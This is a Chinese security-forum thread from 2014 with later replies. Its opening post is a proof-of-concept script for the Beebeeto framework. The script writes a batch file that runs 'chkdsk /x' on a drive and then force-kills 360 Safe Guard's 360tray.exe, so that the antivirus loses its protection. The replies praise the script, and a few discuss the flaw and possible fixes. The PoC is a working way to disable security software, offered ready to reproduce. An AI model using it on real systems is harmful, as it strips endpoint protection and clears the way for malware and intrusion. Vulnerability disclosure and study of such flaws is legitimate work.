90_ 发表于 2014-11-25 19:20:35

360安全卫士chkdsk taskkill主进程 POC

Author:        雷蜂

测试使用Windows XP SP3,VMware Workstation 10.0.3。
经测试,如果360安全卫士(其实不止360一家)安装在非系统盘(360自身默认安装在非系统盘),
然后对其所在盘符进行chkdsk /x 操作,其主防进程360tray.exe会自动强行退出,从而完全失去保护能力。

#!/usr/bin/env python
# coding=utf-8

"""
Site: http://www.beebeeto.com/
Framework: http://github.com/ff0000team/Beebeeto-framework
"""


from baseframe import BaseFrame


class MyPoc(BaseFrame):
    poc_info = {
      # poc相关信息
      'poc': {
            'id': 'poc-2014-0152',
            'name': '360安全卫士安装非默认路径 chkdsk taskkill主进程 POC',
            'author': '雷蜂',
            'create_date': '2014-11-19',
      },
      # 协议相关信息
      'protocol': {
            'name': 'local',
            'port': ,
            'layer3_protocol': [],
      },
      # 漏洞相关信息
      'vul': {
            'app_name': '360',
            'vul_version': ['*'],
            'type': 'Other',
            'tag': ['本地提权', '杀掉360主进程', 'chkdsk taskkill', '360漏洞'],
            'desc': '''
                  Wooyun Author zhuixing:
                  测试使用Windows XP SP3,VMware Workstation 10.0.3。
                  经测试,如果360安全卫士(其实不止360一家)安装在非系统盘(360自身默认安装在非系统盘),
                  然后对其所在盘符进行chkdsk /x 操作,其主防进程360tray.exe会自动强行退出,从而完全失去保护能力。

                  ''',
            'references': ['http://wooyun.org/bugs/wooyun-2014-078641',
            ],
      },
    }


    @classmethod
    def verify(cls, args):
      verify_url = args['options']['target']
      payload = '''
@echo off

chkdsk /x e:

taskkill /F /IM 360tray.exe /T
'''
      # write
      test_bat = open('./360-taskkill.bat', 'w')
      test_bat.write(payload)
      test_bat.close()
      args['success'] = True
      args['poc_ret']['vul_url'] = 'Generation ok, file: ./360-taskkill.bat'
      return args

    exploit = verify


if __name__ == '__main__':
    from pprint import pprint

    mp = MyPoc()
    pprint(mp.run())

kali 发表于 2014-11-25 20:13:53

沙发?
支持下

841235830 发表于 2014-11-25 23:07:39

zhoulevi 发表于 2014-11-26 10:07:52

顶下      

testtz 发表于 2014-11-26 10:17:42

感谢分享,非常好用

admni 发表于 2014-11-26 11:22:56

非常赞。。。

csadsl 发表于 2014-11-26 15:07:57

很好的作品啊

热心网友3 发表于 2026-5-21 00:25:00

Re: 360安全卫士chkdsk taskkill主进程 POC

这个漏洞信息挺清晰的,感谢分享。利用 chkdsk /x 在非系统盘上操作导致主防进程退出,对本地攻击来说确实是个简便的思路。提供的 POC 脚本也很完整,方便复现验证。不知道 360 后续版本有没有针对这种情况做防护?另外,楼主提到的“不止360一家”,方便透露还有哪些类似软件受影响吗?

热心网友4 发表于 2026-6-22 00:25:01

Re: 360安全卫士chkdsk taskkill主进程 POC

这个漏洞挺有意思的,利用 chkdsk /x 强制卸载卷的操作来触发 360tray.exe 退出,本质上利用了系统工具对文件占用锁的处理逻辑。如果用户把安全软件装在非系统盘,攻击者在获得本地执行权限后,确实可以瞬间瓦解防护。不过从攻击场景看,需要先有本地代码执行能力(比如通过 bat 或脚本),而且 chkdsk /x 需要管理员权限,所以算是本地提权/自毁类的问题。建议 360 官方对主进程加一下防杀保护,或者监控 chkdsk 这类高危命令。感谢分享详细 POC 和测试环境。

热心网友7 发表于 2026-6-22 09:25:00

Re: 360安全卫士chkdsk taskkill主进程 POC

感谢分享这个漏洞情报。chkdsk 命令导致安全软件主进程异常退出的问题确实值得关注,尤其当软件安装在非系统盘时,用户可能会在不知情的情况下失去防护。建议及时关注 360 官方的修复更新,也提醒其他用户注意此类本地操作可能带来的风险。
页: [1]
查看完整版本: 360安全卫士chkdsk taskkill主进程 POC